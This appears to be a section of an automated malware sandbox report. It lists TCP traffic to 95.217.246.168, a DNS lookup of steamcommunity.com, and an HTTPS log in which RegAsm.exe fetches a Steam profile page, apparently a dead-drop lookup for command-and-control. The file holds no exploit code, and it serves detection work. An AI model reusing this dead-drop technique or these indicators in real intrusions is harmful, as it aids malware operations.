Apr 26, 2024 21:35:42.410186052 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:42.411343098 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:42.540615082 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:42.540654898 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:42.540777922 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:42.540791035 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.241977930 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.242011070 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.242027044 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.242259979 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.242292881 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.242420912 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.360826969 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.360905886 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.360951900 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.360969067 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.360996008 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.361017942 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.539704084 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.539774895 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.539803028 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.539822102 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.539835930 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.539869070 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.648442984 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.648498058 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.648607969 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.648626089 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.648663998 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.648677111 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.742616892 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.742671967 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.742770910 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.742789984 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.742801905 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.742836952 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.810300112 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.810319901 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.810451984 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.810473919 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.810522079 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.855600119 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.855628967 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.855710030 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.855731010 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.855765104 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.855788946 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.912601948 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.912625074 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.912725925 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.912744999 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.912787914 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.963234901 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.963253975 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.963356972 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:43.963376999 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:43.963424921 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.006972075 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.007008076 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.007133007 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.007158995 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.007204056 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.047215939 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.047266006 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.047302961 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.047323942 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.047338963 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.047363043 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.082761049 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.082808971 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.082855940 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.082875967 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.082890987 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.082915068 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.113231897 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.113312960 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.113339901 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.113357067 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.113368988 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.113394022 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.135389090 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.135441065 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.135525942 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.135541916 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.135564089 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.135591030 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.158246040 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.158293962 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.158442974 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.158461094 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.158471107 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.158503056 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.176301956 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.176359892 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.176397085 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.176412106 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.176430941 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.176449060 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.176496983 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.176542997 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.177000999 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.177012920 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.206002951 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.206037998 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.206140995 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.206424952 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.206435919 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.758177042 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.758322954 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.758805990 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.758816004 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:44.759043932 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:44.759048939 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.605370045 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.605400085 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.605416059 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.605482101 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.605508089 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.605515003 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.605587006 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.994276047 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.994290113 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.994335890 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.994431019 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.994452953 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.994498014 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.994502068 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:45.994514942 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:45.994564056 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.040182114 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.040206909 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.040386915 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.040405035 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.040446997 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.194605112 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.194674015 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.194812059 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.194812059 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.194823980 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.194861889 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:46.194863081 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.194905996 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.922084093 CEST	49753	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:46.922115088 CEST	443	49753	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:47.411748886 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.411792994 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:47.411860943 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.412381887 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.412394047 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:47.941421032 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:47.941529989 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.941957951 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.941967964 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:47.942157030 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:47.942164898 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.887463093 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.887500048 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.887568951 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.887619019 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.887646914 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.887957096 CEST	49754	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.887973070 CEST	443	49754	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.890675068 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.890721083 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:48.890820026 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.891027927 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:48.891042948 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:49.445153952 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:49.445353031 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:49.445733070 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:49.445744038 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:49.445878029 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:49.445882082 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:50.403156996 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:50.403233051 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:50.403245926 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:50.403302908 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.317050934 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.317146063 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:51.366096020 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.366142035 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:51.366245031 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.366566896 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.366581917 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:51.908216000 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:51.908394098 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.911993027 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.912000895 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:51.915270090 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:51.915275097 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:52.845678091 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:52.845757008 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:52.845767975 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:52.845778942 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:52.845819950 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:52.846679926 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:52.846695900 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.424653053 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.424695015 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.424771070 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.424969912 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.424982071 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.958540916 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.958750963 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959120035 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959129095 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.959383965 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959388971 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.959465981 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959479094 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.959595919 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959613085 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.959748030 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959768057 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:53.959858894 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:53.959872007 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.788491964 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.788569927 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.788593054 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.788606882 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.788636923 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.788655043 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.788870096 CEST	49757	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.788885117 CEST	443	49757	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.791982889 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.792062998 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:55.792150021 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.792323112 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:55.792368889 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:56.330096006 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:56.330185890 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:56.330605984 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:56.330615997 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:56.330749989 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:56.330755949 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.294488907 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.294589996 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.294655085 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.294692039 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.294727087 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.294760942 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.294760942 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.296091080 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.296132088 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.296199083 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.296416998 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.296430111 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.605638027 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.605730057 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.839380980 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.839477062 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.839850903 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.839865923 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:57.840199947 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:57.840205908 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:58.788335085 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:58.788420916 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:58.788430929 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:58.788441896 CEST	443	49759	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:58.788477898 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:58.788531065 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:59.716455936 CEST	49759	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:59.716496944 CEST	443	49759	95.217.246.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 21:35:10.233299017 CEST	53319	53	192.168.2.4	1.1.1.1
Apr 26, 2024 21:35:10.359323978 CEST	53	53319	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 21:35:10.233299017 CEST	192.168.2.4	1.1.1.1	0x385d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 21:35:10.359323978 CEST	1.1.1.1	192.168.2.4	0x385d	No error (0)	steamcommunity.com		23.194.234.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

95.217.246.168

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	23.194.234.100	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:10 UTC	119	OUT	GET /profiles/76561199677575543 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:11 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 26 Apr 2024 19:35:11 GMT Content-Length: 33805 Connection: close Set-Cookie: sessionid=2db9bb28bbc37db8659fd33d; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C3594b93e28a41c3ff76e602fcd1c38eb; Path=/; Secure; HttpOnly; SameSite=None
2024-04-26 19:35:11 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-26 19:35:11 UTC	10062	IN	Data Raw: 6c 6c 64 6f 77 6e 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 Data Ascii: lldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
